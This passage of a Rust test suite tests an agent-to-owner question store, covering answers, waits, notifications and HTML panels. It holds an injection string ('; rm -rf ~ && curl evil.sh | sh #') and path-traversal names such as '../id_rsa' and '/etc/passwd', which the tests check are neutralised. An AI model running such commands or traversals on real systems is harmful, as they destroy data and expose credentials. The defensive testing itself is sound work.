1771 // Four different mistakes, four different fixes: the web handler shows
1772 // these strings to the person who made them.
1773 let mut unoffered = choice_question();
1774 let a = unoffered
1775 .answer(Answer::Choice("Postgres".to_owned()))
1776 .unwrap_err()
1777 .to_string();
1778
1779 let mut typed = choice_question();
1780 let b = typed
1781 .answer(Answer::Text("use Postgres".to_owned()))
1782 .unwrap_err()
1783 .to_string();
1784
1785 let mut blank = free_question();
1786 let c = blank
1787 .answer(Answer::Text(" \n".to_owned()))
1788 .unwrap_err()
1789 .to_string();
1790
1791 let mut twice = choice_question();
1792 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
1793 let d = twice
1794 .answer(Answer::Choice("Redis".to_owned()))
1795 .unwrap_err()
1796 .to_string();
1797
1798 assert!(a.contains("not one of the choices"), "{a}");
1799 assert!(b.contains("multiple choice"), "{b}");
1800 assert!(c.contains("empty"), "{c}");
1801 assert!(d.contains("already answered"), "{d}");
1802 let mut distinct = vec![a, b, c, d];
1803 let asked = distinct.len();
1804 distinct.sort_unstable();
1805 distinct.dedup();
1806 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
1807
1808 // The refused ones are still open, so the owner can answer properly.
1809 assert_eq!(unoffered.status, QuestionStatus::Open);
1810 assert_eq!(typed.status, QuestionStatus::Open);
1811 assert_eq!(blank.status, QuestionStatus::Open);
1812 // And the first answer to the double-answered one survived.
1813 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
1814
1815 // Free text refuses a fabricated choice for the mirror-image reason.
1816 let mut free = free_question();
1817 let e = free
1818 .answer(Answer::Choice("SQLite".to_owned()))
1819 .unwrap_err()
1820 .to_string();
1821 assert!(e.contains("free text"), "{e}");
1822 }
1823
1824 #[test]
1825 fn open_questions_are_listed_before_answered_ones() {
1826 let (_dir, s) = store();
1827 // Ids carry a timestamp, so force a known order: the answered one is
1828 // the newest, and must still sort below the open ones.
1829 let mut old_open = choice_question();
1830 old_open.id = "20260101-000001-aaaa".to_owned();
1831 let mut new_open = choice_question();
1832 new_open.id = "20260101-000002-bbbb".to_owned();
1833 let mut answered = choice_question();
1834 answered.id = "20260101-000003-cccc".to_owned();
1835 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
1836 for q in [&mut old_open, &mut new_open, &mut answered] {
1837 s.put(q).unwrap();
1838 }
1839
1840 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
1841 assert_eq!(
1842 ids,
1843 [
1844 "20260101-000002-bbbb",
1845 "20260101-000001-aaaa",
1846 "20260101-000003-cccc"
1847 ],
1848 "what has stopped work comes first; history sorts underneath"
1849 );
1850 assert_eq!(s.count_open(), 2);
1851 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
1852 assert!(s.open_for("some-other-run").is_empty());
1853 // The short id is what the phone and the reports show.
1854 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
1855 assert!(s.get("20260101-000002-bbbb").is_ok());
1856 assert!(s.resolve_id("nope").is_err());
1857 assert!(
1858 s.revision() > 0,
1859 "the store's mtime drives the phone's polling"
1860 );
1861 }
1862
1863 #[test]
1864 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
1865 let (_dir, s) = store();
1866 let mut good = choice_question();
1867 s.put(&mut good).unwrap();
1868 // Truncated by a killed writer, and written by a magi from the future.
1869 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
1870 let future = serde_json::json!({
1871 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
1872 "seat": "s", "summary": "?", "detail": "", "choices": [],
1873 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
1874 "answered_at": null, "answer": null,
1875 });
1876 std::fs::write(
1877 s.path_of("20260101-000010-beef"),
1878 serde_json::to_string(&future).unwrap(),
1879 )
1880 .unwrap();
1881
1882 let listed = s.list();
1883 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
1884 assert_eq!(listed[0].id, good.id);
1885 // Asked for by name, the unreadable one explains itself instead.
1886 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
1887 assert!(e.contains("schema"), "{e}");
1888 }
1889
1890 #[tokio::test]
1891 async fn the_wait_returns_the_answer_another_process_wrote() {
1892 // The phone, `magi answer` and this run are three processes with no
1893 // channel between them: the file is the channel, so the wait has to see
1894 // a write it did not make. Sub-second timings keep this a real wait
1895 // without a real one's duration.
1896 let (dir, s) = store();
1897 let mut q = choice_question();
1898 let id = q.id.clone();
1899 let writer = Questions::at(dir.path().join("questions"));
1900 let handle = tokio::spawn(async move {
1901 tokio::time::sleep(Duration::from_millis(30)).await;
1902 let mut fresh = writer.get(&id).expect("the question was filed first");
1903 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
1904 writer.put(&mut fresh).unwrap();
1905 });
1906
1907 let got = wait_for_owner(
1908 &mut q,
1909 &s,
1910 &quiet(),
1911 Duration::from_secs(5),
1912 Duration::from_millis(10),
1913 )
1914 .await
1915 .unwrap();
1916
1917 handle.await.unwrap();
1918 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
1919 assert_eq!(
1920 q.status,
1921 QuestionStatus::Answered,
1922 "the caller's copy is refreshed from the answering process's record"
1923 );
1924 assert!(q.answered_at.is_some());
1925 }
1926
1927 #[tokio::test]
1928 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
1929 let (_dir, s) = store();
1930 let mut q = choice_question();
1931
1932 let got = wait_for_owner(
1933 &mut q,
1934 &s,
1935 &quiet(),
1936 Duration::from_millis(60),
1937 Duration::from_millis(10),
1938 )
1939 .await
1940 .unwrap();
1941
1942 assert_eq!(
1943 got,
1944 Wait::Abandoned,
1945 "a slow human is not an error; the run parks"
1946 );
1947 assert_eq!(q.status, QuestionStatus::Abandoned);
1948 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
1949 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
1950 assert!(
1951 on_disk.detail.contains("Abandoned:"),
1952 "why nobody answered belongs with the question: {}",
1953 on_disk.detail
1954 );
1955 assert!(on_disk.resolution().is_none());
1956 assert_eq!(s.count_open(), 0);
1957 }
1958
1959 #[tokio::test]
1960 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
1961 // This is the whole point of slicing: `timeout` (the real
1962 // `answer_timeout` budget) is far larger than `slice`, so the loop
1963 // must land on `slice` first and hand back `Pending` - not read the
1964 // silence so far as the owner having given up.
1965 let (_dir, s) = store();
1966 let mut q = choice_question();
1967 s.put(&mut q).unwrap();
1968
1969 let got = wait_loop(
1970 &mut q,
1971 &s,
1972 Duration::from_secs(3600),
1973 Duration::from_millis(30),
1974 Duration::from_millis(10),
1975 )
1976 .await
1977 .unwrap();
1978
1979 assert_eq!(
1980 got,
1981 Wait::Pending,
1982 "the clock on this call ran out, not the owner's patience"
1983 );
1984 assert_eq!(
1985 q.status,
1986 QuestionStatus::Open,
1987 "a slice expiring must never abandon the question"
1988 );
1989 let on_disk = s.get(&q.id).expect("still on disk, still open");
1990 assert_eq!(
1991 on_disk.status,
1992 QuestionStatus::Open,
1993 "nothing about the record changed just because this call gave up"
1994 );
1995 }
1996
1997 #[tokio::test]
1998 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
1999 // The shape `magi ask --wait <id>` relies on: one slice finds nothing
2000 // and returns `Pending`, a second slice - a fresh call, exactly as a
2001 // fresh process would make - picks the same question back up and
2002 // sees an answer written in between.
2003 let (dir, s) = store();
2004 let mut q = choice_question();
2005 s.put(&mut q).unwrap();
2006
2007 let first = wait_loop(
2008 &mut q,
2009 &s,
2010 Duration::from_secs(3600),
2011 Duration::from_millis(30),
2012 Duration::from_millis(10),
2013 )
2014 .await
2015 .unwrap();
2016 assert_eq!(first, Wait::Pending);
2017
2018 let id = q.id.clone();
2019 let writer = Questions::at(dir.path().join("questions"));
2020 let mut fresh = writer.get(&id).unwrap();
2021 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2022 writer.put(&mut fresh).unwrap();
2023
2024 // `resume_wait` uses its own production poll interval rather than a
2025 // test-injected one, so the budget here only needs to be large enough
2026 // to cover one real poll tick - the point is that it is `resume_wait`
2027 // itself, not a helper, that finds the answer.
2028 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2029 .await
2030 .unwrap();
2031 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2032 assert_eq!(q.status, QuestionStatus::Answered);
2033 }
2034
2035 #[tokio::test]
2036 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2037 // The owner can speak back while nothing is running at all - between
2038 // one call reporting `Wait::Pending` and the next `--wait` picking
2039 // the question back up - and whoever resumes the wait loads a
2040 // *fresh* copy of the question off disk, one whose thread already
2041 // contains that reply. A baseline taken from that fresh copy would
2042 // treat the reply as pre-existing and never notice it "arrive",
2043 // leaving the agent polling in silence until `answer_timeout`
2044 // eventually abandons the question - replacing the exact accident
2045 // this feature exists to fix with a quieter version of itself.
2046 let (dir, s) = store();
2047 let mut q = choice_question();
2048 s.put(&mut q).unwrap();
2049
2050 let first = wait_loop(
2051 &mut q,
2052 &s,
2053 Duration::from_secs(3600),
2054 Duration::from_millis(30),
2055 Duration::from_millis(10),
2056 )
2057 .await
2058 .unwrap();
2059 assert_eq!(first, Wait::Pending);
2060
2061 // The owner speaks back during the gap, with nobody running yet.
2062 let id = q.id.clone();
2063 let writer = Questions::at(dir.path().join("questions"));
2064 let mut fresh = writer.get(&id).unwrap();
2065 fresh.say("why not Postgres?").unwrap();
2066 writer.put(&mut fresh).unwrap();
2067
2068 // `magi ask --wait` re-reads the question rather than reusing the
2069 // stale in-memory copy the earlier call held - so the copy handed to
2070 // `resume_wait` here already carries the reply, same as `fresh` above.
2071 let mut resumed = s.get(&id).unwrap();
2072 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2073 .await
2074 .unwrap();
2075 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2076 assert_eq!(
2077 resumed.status,
2078 QuestionStatus::Open,
2079 "talking back is not a decision; the question stays open"
2080 );
2081 }
2082
2083 #[tokio::test]
2084 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2085 // A broken webhook must not throw away an implementation, so the wait
2086 // reports the failure and carries on. `notify` itself still says what
2087 // went wrong, because `magi notify --test` has to be able to show it.
2088 let (dir, s) = store();
2089 let broken = config::Notify {
2090 command: vec![
2091 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2092 "{summary}".to_owned(),
2093 ],
2094 };
2095 let mut q = choice_question();
2096 assert!(
2097 notify(&broken, &q).await.is_err(),
2098 "the caller is told; it decides that it does not matter"
2099 );
2100
2101 let id = q.id.clone();
2102 let writer = Questions::at(dir.path().join("questions"));
2103 let handle = tokio::spawn(async move {
2104 tokio::time::sleep(Duration::from_millis(30)).await;
2105 let mut fresh = writer.get(&id).unwrap();
2106 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2107 writer.put(&mut fresh).unwrap();
2108 });
2109 let got = wait_for_owner(
2110 &mut q,
2111 &s,
2112 &broken,
2113 Duration::from_secs(5),
2114 Duration::from_millis(10),
2115 )
2116 .await
2117 .unwrap();
2118 handle.await.unwrap();
2119 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2120
2121 // No command at all is the default, and is silence rather than failure.
2122 assert!(notify(&quiet(), &q).await.is_ok());
2123 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2124 }
2125
2126 #[test]
2127 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2128 let mut q = choice_question();
2129 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2130 let template = [
2131 "ntfy".to_owned(),
2132 "publish".to_owned(),
2133 "--click".to_owned(),
2134 "{url}".to_owned(),
2135 "--title".to_owned(),
2136 "magi {run} needs you".to_owned(),
2137 "{summary}".to_owned(),
2138 ];
2139 let argv: Vec<String> = template
2140 .iter()
2141 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2142 .collect();
2143
2144 assert_eq!(
2145 argv,
2146 [
2147 "ntfy",
2148 "publish",
2149 "--click",
2150 "http://100.64.0.1:7777/#/questions",
2151 "--title",
2152 "magi 20260902-201256-9fb7 needs you",
2153 "; rm -rf ~ && curl evil.sh | sh #",
2154 ],
2155 "the shell metacharacters are one argument's contents, not syntax"
2156 );
2157
2158 // A summary that itself mentions a placeholder is text, not a template:
2159 // one left-to-right pass means a substituted value is never rescanned.
2160 q.summary = "should {url} be configurable?".to_owned();
2161 assert_eq!(
2162 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2163 "should {url} be configurable?"
2164 );
2165 // An unknown brace is the operator's own text and survives untouched.
2166 assert_eq!(
2167 expand("{title}: {run}", &q.run, &q.summary, ""),
2168 "{title}: 20260902-201256-9fb7"
2169 );
2170 assert_eq!(
2171 expand("no placeholders", &q.run, &q.summary, "http://x"),
2172 "no placeholders"
2173 );
2174 }
2175
2176 #[test]
2177 fn the_notification_link_lands_on_the_view_that_can_answer() {
2178 assert_eq!(
2179 question_url("http://100.64.0.1:7777"),
2180 "http://100.64.0.1:7777/#/questions"
2181 );
2182 assert_eq!(
2183 question_url("http://100.64.0.1:7777/"),
2184 "http://100.64.0.1:7777/#/questions"
2185 );
2186 // An operator who wrote a fragment has said where they want to land.
2187 assert_eq!(
2188 question_url("http://magi.ts.net/#/runs"),
2189 "http://magi.ts.net/#/runs"
2190 );
2191 // Unset expands to nothing rather than to a guessed address.
2192 assert_eq!(question_url(" "), "");
2193 }
2194
2195 /// A question with a fixed id, so a panel's path on disk is predictable.
2196 fn panelled() -> Question {
2197 let mut q = choice_question();
2198 q.id = "20260903-014455-ab12".to_owned();
2199 q
2200 }
2201
2202 #[test]
2203 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2204 let (dir, s) = store();
2205 let work = dir.path().join("worktree");
2206 std::fs::create_dir_all(&work).unwrap();
2207 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2208 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2209
2210 let mut q = panelled();
2211 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2212 s.put_panel(
2213 &mut q,
2214 html,
2215 &[work.join("table.png"), work.join("diff.svg")],
2216 )
2217 .unwrap();
2218 s.put(&mut q).unwrap();
2219
2220 assert!(q.panel);
2221 assert_eq!(
2222 q.assets,
2223 ["diff.svg", "table.png"],
2224 "sorted, not in the order the agent happened to pass them"
2225 );
2226 assert_eq!(
2227 s.panel_html(&q.id).as_deref(),
2228 Some(html),
2229 "the html is stored byte for byte; the agent authored the markup"
2230 );
2231 assert_eq!(
2232 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2233 Some(&b"<svg/>"[..])
2234 );
2235
2236 // The record on disk carries the same two fields the front end reads.
2237 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2238 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2239 assert_eq!(json["panel"], true);
2240 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2241 let back = s.get(&q.id).unwrap();
2242 assert!(back.panel);
2243 assert_eq!(back.assets, q.assets);
2244
2245 // The assets were copied, so the panel still renders after `magi fold`
2246 // has deleted the candidate worktree the agent authored it in.
2247 std::fs::remove_dir_all(&work).unwrap();
2248 assert_eq!(
2249 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2250 Some(&b"\x89PNG"[..]),
2251 "a referenced asset would be gone with the worktree"
2252 );
2253 }
2254
2255 #[test]
2256 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2257 let (dir, s) = store();
2258 let mut q = panelled();
2259 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2260 s.put(&mut q).unwrap();
2261
2262 // A file exactly one level up from the panel directory - which is
2263 // where `..` lands - holding content a read would make visible.
2264 let secret = "this must never reach the browser";
2265 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2266 assert_eq!(
2267 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2268 secret,
2269 "the traversal is real: the operating system resolves this path \
2270 happily, which is why the name has to be refused before the join"
2271 );
2272
2273 let long = "x".repeat(200);
2274 for name in [
2275 "..",
2276 "../id_rsa",
2277 "..\\id_rsa",
2278 "sub/../id_rsa",
2279 "/",
2280 "\\",
2281 "/etc/passwd",
2282 "C:\\Windows\\win.ini",
2283 "",
2284 ".hidden",
2285 ".",
2286 long.as_str(),
2287 ] {
2288 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2289 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2290 assert!(
2291 e.contains("not a panel file name"),
2292 "`{name}` must be refused as a name, not attempted: {e}"
2293 );
2294 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2295 }
2296 // A name that is allowed still finds its file, so the refusals above
2297 // were the rule at work and not a store that reads nothing.
2298 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2299
2300 // The same rule on the write side, where the name comes from a source
2301 // file's base name, and a refusal leaves the stored panel untouched.
2302 let hidden = dir.path().join(".hidden");
2303 std::fs::write(&hidden, "x").unwrap();
2304 let e = s
2305 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2306 .unwrap_err()
2307 .to_string();
2308 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2309 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2310 assert!(q.assets.is_empty());
2311 }
2312
2313 #[test]
2314 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2315 let (dir, s) = store();
2316 let mut q = panelled();
2317 s.put(&mut q).unwrap();
2318
2319 // Sized rather than filled: the cap reads the file's length, and a
2320 // test that actually produced eight mebibytes would only be slower.
2321 let big = dir.path().join("recording.png");
2322 std::fs::File::create(&big)
2323 .unwrap()
2324 .set_len(PANEL_MAX_BYTES)
2325 .unwrap();
2326
2327 let html = "<p>see the recording</p>";
2328 let total = PANEL_MAX_BYTES + html.len() as u64;
2329 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2330 assert!(
2331 e.contains(&PANEL_MAX_BYTES.to_string()),
2332 "the cap is named so the agent knows the limit: {e}"
2333 );
2334 assert!(
2335 e.contains(&total.to_string()),
2336 "the actual size is named so the agent knows by how much: {e}"
2337 );
2338
2339 assert!(!q.panel);
2340 assert!(q.assets.is_empty());
2341 let left: Vec<String> = std::fs::read_dir(s.root())
2342 .unwrap()
2343 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2344 .collect();
2345 assert_eq!(
2346 left,
2347 [format!("{}.json", q.id)],
2348 "a refused panel leaves neither a directory nor scratch: {left:?}"
2349 );
2350 }
2351
2352 #[test]
2353 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2354 let (dir, s) = store();
2355 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2356 std::fs::create_dir_all(&before).unwrap();
2357 std::fs::create_dir_all(&after).unwrap();
2358 std::fs::write(before.join("diff.png"), "before").unwrap();
2359 std::fs::write(after.join("diff.png"), "after").unwrap();
2360
2361 let mut q = panelled();
2362 let e = s
2363 .put_panel(
2364 &mut q,
2365 "<p>x</p>",
2366 &[before.join("diff.png"), after.join("diff.png")],
2367 )
2368 .unwrap_err()
2369 .to_string();
2370 assert!(e.contains("diff.png"), "{e}");
2371 assert!(
2372 e.contains("before") && e.contains("after"),
2373 "both sources are named, because the fix is to rename one: {e}"
2374 );
2375 assert!(!q.panel);
2376 assert!(!s.panel_dir(&q.id).exists());
2377 }
2378
2379 #[test]
2380 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2381 let (dir, s) = store();
2382 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2383 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2384
2385 let mut q = panelled();
2386 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2387 .unwrap();
2388 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2389 .unwrap();
2390
2391 assert_eq!(q.assets, ["new.png"]);
2392 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2393 assert!(
2394 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2395 "an asset from the first attempt would show a mix of two answers"
2396 );
2397
2398 s.drop_panel(&q.id).unwrap();
2399 assert!(s.panel_html(&q.id).is_none());
2400 assert!(!s.panel_dir(&q.id).exists());
2401 s.drop_panel(&q.id)
2402 .expect("dropping a panel that is already gone is the desired state");
2403 }
2404
2405 #[test]
2406 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2407 let (_dir, s) = store();
2408 let mut q = panelled();
2409 s.put(&mut q).unwrap();
2410
2411 assert!(!q.panel);
2412 assert!(s.panel_html(&q.id).is_none());
2413 assert!(
2414 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2415 "a missing file is a 404 for the caller, not a failure of the store"
2416 );
2417 let json = serde_json::to_value(&q).unwrap();
2418 assert_eq!(json["panel"], false);
2419 assert_eq!(json["assets"], serde_json::json!([]));
2420
2421 // And an empty panel is refused, because an empty frame reads to the
2422 // owner as "the agent had nothing to say".
2423 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2424 assert!(e.contains("empty panel"), "{e}");
2425 assert!(!s.panel_dir(&q.id).exists());
2426 }
2427
2428 #[test]
2429 fn a_question_written_before_panels_existed_still_deserialises() {
2430 let (_dir, s) = store();
2431 std::fs::create_dir_all(s.root()).unwrap();
2432 let id = "20260902-231501-ab12";
2433 // Byte for byte what an older magi wrote: no `panel`, no `assets`.
2434 let body = r#"{
2435 "schema": 1,
2436 "id": "20260902-231501-ab12",
2437 "run": "20260902-201256-9fb7",
2438 "node": "implement",
2439 "seat": "impl-A",
2440 "summary": "Which storage backend should the cache use?",
2441 "detail": "Both are already dependencies.",
2442 "choices": ["SQLite", "Redis"],
2443 "status": "open",
2444 "asked_at": "2026-09-02T23:15:01Z",
2445 "answered_at": null,
2446 "answer": null
2447}"#;
2448 std::fs::write(s.path_of(id), body).unwrap();
2449
2450 let q = s.get(id).unwrap();
2451 assert!(
2452 !q.panel,
2453 "an absent field means no panel, not a parse error"
2454 );
2455 assert!(q.assets.is_empty());
2456 // Schema 1 predates `thread` entirely - not merely predates it having
2457 // any turns - and this build now speaks schema 3. Reading it must not
2458 // be an error: `q.schema > SCHEMA` is false for 1 > 3, so the file is
2459 // accepted and the missing field defaults to no conversation yet.
2460 assert_eq!(q.schema, 1);
2461 assert!(q.thread.is_empty());
2462 assert_eq!(
2463 q.answer_timeout, 0,
2464 "an absent field means unrecorded, not a zero-second deadline"
2465 );
2466 assert!(!q.waiting_on_agent());
2467 assert_eq!(q.summary, "Which storage backend should the cache use?");
2468 assert_eq!(
2469 s.list().len(),
2470 1,
2471 "and it is still listed; skipping it would hide an open question"
2472 );
2473 }
2474
2475 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2476 Turn {
2477 who,
2478 body: body.to_owned(),
2479 at,
2480 }
2481 }
2482
2483 #[test]
2484 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2485 // The phone reads this shape by hand, same as the question itself: a
2486 // rename here is a card that silently drops every message in it.
2487 let mut q = choice_question();
2488 q.thread
2489 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2490 let value = serde_json::to_value(&q.thread[0]).unwrap();
2491 let mut keys: Vec<&str> = value
2492 .as_object()
2493 .unwrap()
2494 .keys()
2495 .map(String::as_str)
2496 .collect();
2497 keys.sort_unstable();
2498 assert_eq!(keys, ["at", "body", "who"]);
2499 assert_eq!(value["who"], "operator");
2500 assert_eq!(value["body"], "why not Postgres?");
2501
2502 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2503 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2504 assert_eq!(parsed.who, Who::Agent);
2505 }
2506
2507 #[test]
2508 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
2509 let mut q = choice_question();
2510 q.say("does the cache need eviction?").unwrap();
2511 assert_eq!(q.thread.len(), 1);
2512 assert_eq!(q.thread[0].who, Who::Operator);
2513 assert_eq!(q.thread[0].body, "does the cache need eviction?");
2514 // Speaking is not deciding: the status and the answer are untouched,
2515 // which is the whole point of the round trip existing at all.
2516 assert_eq!(q.status, QuestionStatus::Open);
2517 assert!(q.answer.is_none());
2518 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
2519 }
2520
2521 #[test]
2522 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
2523 let mut answered = choice_question();
2524 answered
2525 .answer(Answer::Choice("SQLite".to_owned()))
2526 .unwrap();
2527 let a = answered.say("still there?").unwrap_err().to_string();
2528 assert!(a.contains("already answered"), "{a}");
2529 let b = answered
2530 .reply("still there?", vec![])
2531 .unwrap_err()
2532 .to_string();
2533 assert!(b.contains("already answered"), "{b}");
2534
2535 let mut abandoned = choice_question();
2536 abandoned.abandon("timed out");
2537 let c = abandoned.say("hello?").unwrap_err().to_string();
2538 assert!(c.contains("abandoned"), "{c}");
2539
2540 let mut open = choice_question();
2541 let d = open.say(" ").unwrap_err().to_string();
2542 assert!(d.contains("empty"), "{d}");
2543 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
2544 assert!(e.contains("empty"), "{e}");
2545 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
2546 }
2547
2548 #[test]
2549 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
2550 let mut q = choice_question();
2551 q.say("SQLite or Redis, but what about disk space?")
2552 .unwrap();
2553 assert!(q.waiting_on_agent());
2554
2555 q.reply(
2556 "SQLite: it is one file, no server to run.",
2557 vec!["SQLite".to_owned()],
2558 )
2559 .unwrap();
2560
2561 assert_eq!(q.choices, ["SQLite"]);
2562 assert!(
2563 !q.waiting_on_agent(),
2564 "the agent spoke, so the owner is the one being waited on now"
2565 );
2566 assert_eq!(q.thread.len(), 2);
2567 assert_eq!(q.thread[1].who, Who::Agent);
2568
2569 // The new choice set is what a subsequent answer is checked against.
2570 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
2571 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2572 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
2573 }
2574
2575 #[test]
2576 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
2577 let mut fresh = choice_question();
2578 assert!(
2579 fresh.should_notify(Timestamp::now()),
2580 "nobody has been notified yet, so the first ask always pages"
2581 );
2582
2583 fresh.say("why not Postgres?").unwrap();
2584 let just_said = fresh.thread[0].at;
2585 assert!(
2586 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
2587 "still on the screen a minute later; no need to page again"
2588 );
2589 assert!(
2590 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
2591 "exactly the window: `>` means this side stays quiet"
2592 );
2593 assert!(
2594 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
2595 "past the window: they may have walked away"
2596 );
2597 }
2598
2599 #[test]
2600 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
2601 let (_dir, s) = store();
2602 let mut q = choice_question();
2603 s.put(&mut q).unwrap();
2604 q.say("why not Postgres?").unwrap();
2605 s.put(&mut q).unwrap();
2606 q.reply("no server to run", vec!["SQLite".to_owned()])
2607 .unwrap();
2608 s.put(&mut q).unwrap();
2609
2610 assert_eq!(
2611 s.count_open(),
2612 1,
2613 "one question that talked twice is still one open question"
2614 );
2615 assert_eq!(s.open_for(&q.run).len(), 1);
2616 }
2617
2618 #[tokio::test]
2619 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
2620 let (dir, s) = store();
2621 let mut q = choice_question();
2622 let id = q.id.clone();
2623 let writer = Questions::at(dir.path().join("questions"));
2624 let handle = tokio::spawn(async move {
2625 tokio::time::sleep(Duration::from_millis(30)).await;
2626 let mut fresh = writer.get(&id).expect("the question was filed first");
2627 fresh.say("why not Postgres?").unwrap();
2628 writer.put(&mut fresh).unwrap();
2629 });
2630
2631 let got = wait_for_owner(
2632 &mut q,
2633 &s,
2634 &quiet(),
2635 Duration::from_secs(5),
2636 Duration::from_millis(10),
2637 )
2638 .await
2639 .unwrap();
2640
2641 handle.await.unwrap();
2642 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
2643 assert_eq!(
2644 q.status,
2645 QuestionStatus::Open,
2646 "talking back is not a decision; the question stays open"
2647 );
2648 assert!(q.answer.is_none());
2649 }
2650
2651 #[test]
2652 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
2653 let mut q = choice_question();
2654 q.say("A").unwrap();
2655 q.delivered_turns = q.thread.len();
2656 q.say("B").unwrap();
2657 q.reply("about A", vec![]).unwrap();
2658 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
2659 q.delivered_turns = q.thread.len();
2660 assert_eq!(q.unread_from_owner(), None);
2661 }
2662}